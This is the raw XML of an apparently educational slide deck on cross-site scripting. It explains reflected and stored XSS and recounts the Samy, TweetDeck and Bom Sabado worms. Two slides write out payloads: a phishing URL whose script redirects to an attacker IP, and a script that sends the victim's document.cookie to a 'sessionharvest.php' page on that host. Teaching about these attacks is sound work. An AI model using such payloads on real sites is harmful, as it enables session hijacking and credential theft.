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36.54.69.111/recordsform.php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Cross-Site Scripting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Reed Sager, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="64646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Michael Riesberg-Timmer, Jacob Bundt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85250" y="154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Example: “Bom Sabado” Worm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55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vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles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a user opened an already infected page javascript code would automatically run, forcing you to join one of the creators “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Communities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user would then automatically send a scrap to all the users friend with the message “Bom Sabato”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Infected Over 400,000 different users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950" y="1017725"/>
            <a:ext cx="315337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248" y="104573"/>
            <a:ext cx="814825" cy="8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0900" y="35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XSS can accomplish: Injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>CryptoCurrency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> Miners</a:t>
            </a:r>
            <a:endParaRPr sz="20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432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December of 2017 there was a case on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Starbucks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> public Wi-Fi where a delay was happening between users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>requesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> pages and the pages being served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investigation found that this was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> users were being served pages with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CryptoCurrency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> miners inject into them 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75" y="1078225"/>
            <a:ext cx="3987525" cy="36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848" y="158723"/>
            <a:ext cx="851150" cy="8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XSS can accomplish: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> URLS</a:t>
            </a:r>
            <a:endParaRPr sz="20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Attackers can use XSS to create phishing links by using a link to a real website but including a &lt;script&gt; tag inside of that URL that redirects user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> own website where they can duplicate the login screen of original website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But instead of logging you into desired website it sends the users information straight to the attacker. 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Example URL</a:t>
            </a:r>
            <a:endParaRPr sz="13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highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>http://fictionaldot.gov/records/someexploitablepage.cfm?rec=6dhshjfjflds&amp;uid=JLHKLLEIUUTUHHWJJW-HJHKH-GHGJGKHKH-HKH787868&amp;errorMessage=&lt;script&gt;window.location='http://36.54.69.111/recordsform.php'&lt;/script&gt;&amp;HGH=dH8787JHJH</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F4CCCC"/>
              </a:highlight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Where the attacker redirects the user to their site with the following part of the URL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highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://36.54.69.111/recordsform.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>'&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F4CCCC"/>
              </a:highlight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  <a:highlight>
                <a:srgbClr val="F4CCCC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  <a:highlight>
                <a:srgbClr val="F4CCCC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  <a:highlight>
                <a:srgbClr val="F4CCCC"/>
              </a:highlight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865" y="107875"/>
            <a:ext cx="1575535" cy="9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2429" y="642997"/>
            <a:ext cx="61229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XSS Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>accomplish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>: Stealing Users session cookies </a:t>
            </a:r>
            <a:endParaRPr sz="2000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714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attacker injects a script into a link that an unsuspecting user can click, if the attacker can land a link onto the target site then they can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> a script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rgbClr val="F4CCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='http://36.54.69.111/sessionharvest.php?cookie=' + document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F4CCCC"/>
              </a:highlight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takes the user’s Cookies and passes it to the attacker’s own website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675" y="2110550"/>
            <a:ext cx="1529625" cy="18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Works: Definition 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XSS (Cross-Site Scripting) is a way of enabling attackers to run JavaScript on pages that they should not have permission to run while they are being viewed by the website’s users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 of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>XSS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Non-Persistent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Persistent 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225" y="2273100"/>
            <a:ext cx="4149175" cy="21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48475" y="39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Works: Non-Persistent XSS (Reflected XSS)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514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when a website has a form that the user can input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from the form are then used by the server without sanitizing the inputs resulting in attackers being able to inject markup into the website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performed by sending an unsuspecting target a link to the vulnerable site where the script is injected.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 tricking the user into running the script behind the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>scenes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> browser 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450" y="972325"/>
            <a:ext cx="3560849" cy="38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works: Persistent XSS (Stored XSS)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51225" y="1017725"/>
            <a:ext cx="47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attack happens when a website provides the user with some type of way to leave their own content on the page that other users can see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	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news website will more then likely have a comment section under the article that for users that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>registered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the website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comments are not sanitized before being published it would allow someone to leave  a script tag inside of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> comment that would load and run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>every time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> anyone looked at the page containing their comment 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625" y="1017725"/>
            <a:ext cx="3892674" cy="37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3475" y="33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XSS used?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59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XSS attacks occur on web applications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commonly in webpages to affect HTML or JavaScript but can affect any other code that is processed by a website.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places for these attacks are web pages/applications that accept user input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 Comment Section or a user posts to a page (ex. Twitter text Box)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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> also encompass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sites that are passed onto users through links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Links may be passed through Social engineering or even through email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100" y="1433500"/>
            <a:ext cx="2620200" cy="27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XSS used?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XSS is used when the submission forms do not have any regulations to avoid such attacks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sanitizing the input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Ex. When a site allows a user to post a comment that contains a &lt;Script&gt; Tag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Attacks using malicious links are often used during </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>searching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> processes in websites such as a search page.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XSS Attack may for example insert an extra website that contains a virus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Example: Samy Worm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58833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XSS worm written by Samy Kamkar that infected over 1 million MySpace Profiles in less then 20 hours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Worm spread through abusing a persistent XSS Vulnerability in MySpace’s person profile webpage template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user viewed Samy's profile or an already affected profile it would automatically send him a friend request and also display the string "but most of all, samy is my hero" on the users profile page.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Fastest spreading Virus of all time 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50" y="1267850"/>
            <a:ext cx="2954750" cy="33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821" y="343288"/>
            <a:ext cx="2808700" cy="7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Samy Worm Code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Example: TweetDeck Worm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5225"/>
            <a:ext cx="85206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a result of an XSS Vulnerability in Tweet Decks software that didn’t properly filter code out of the tweets that were displayed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XSS worm that caused over 87,000 users to retweet a message containing a javascript command within a few hours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worm caused any user that viewed the tweet to automatically retweet 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75" y="3042850"/>
            <a:ext cx="6899825" cy="1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025" y="232675"/>
            <a:ext cx="919800" cy="9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